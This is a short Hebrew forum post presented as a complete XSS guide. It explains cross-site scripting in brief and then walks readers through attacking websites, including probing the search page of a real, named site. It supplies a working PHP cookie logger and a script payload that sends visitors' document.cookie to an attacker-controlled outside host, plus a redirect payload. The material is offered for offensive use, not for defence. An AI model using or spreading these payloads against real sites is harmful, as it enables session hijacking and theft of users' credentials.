XSS המדריך המלא
מדריך XSS מלא!
1)הסבר מה זה XSS.
2)שימוש XSS.
3)סקריפטים XSS.
אז מה זה XSS?.
אז בעצם XSS זה פירצה מאפשרת לשתול קוד זדוני בתוך קישור תמים, או בתוך קובץ (תמונה למשל)
שלא עובר בדיקת-תוכן.
הקוד הזדוני יכול לבצע מספר רב של פעולות כגון גניבת ה"עוגיה" (קובץ מיוחד
הנשתל במחשבי הגולשים ומיועד לשמירת פרטי המשתמש לצורך זיהוי אוטומטי.
לקשר את האתר לכתובת אחרת .
מקווה שהבנתם עם לא אל תמשיכו לקרוא לכו לגוגל ותחפשו חומר על XSS או תישאלו כאן בפורום.
שימוש ב XSS
למשל ניקח לדוגמא את האתר TIPO אתר גדול עם אלפי גולשים יום יום!
נלך לחיפוש
שמה יש פריצת XSS איך בודקים?קוד:http://www.************/apps/click/TipoIndex_Search.asp
מריצים בחיפוש את הסריפט הבא:
יפה עם יש הודעה שגיאה עם המילה XSS בפנים אז יש פריצת XSS.קוד:<script>alert("XSS");</script>
אבל...דרך החיפוש רוב הסיכויים שזהל א יעבוד למה זה לא שולח פרטים למסד .. אז בעצם ההודעת שגיאה תיהיה סתם צריך לחפש מקומות יותר משמעותים כמו למשל הרשמה,התחברות,פתיחת נושא,תגובה לנושא ועוד .. תחשבו לבד.
יפה זה בעצם הכל עם באתר יש פריצת XSS אתה יכול לגנוב עוגיה לקשר את העמוד לדף אחד לכתוב בעמוד דברים ועוד הרבה דברים ...
סקריפטים XSS
קוד:<script>alert("XSS");</script> בדיקת XSS
גניבת עוגיות
אתם צריכים שרת שלשם ישלחו העוגיות..
עכשיו פתחו בשרת שלכם קובץ בשם logfile.txt
וקובץ בשם : XSS.PHP
יפה עכשיו פשוט הסקריפטקוד:<?php $filename = "logfile.txt"; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, 'a')) { exit; } else { if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE) { exit; } } fclose($handle); exit; } exit; ?>
קישור לדף אחר שמים בדף איפה שהחור XSS שלכםקוד:<script>location.href=("http://www.exxxx.co.il/xss.php?cookie="+document.cookie)</Script>
קוד:<script>location.href("walla.co.il");</script>
זהו הסוף..
קרדיט לאתר אחר
ציטוט ההודעה
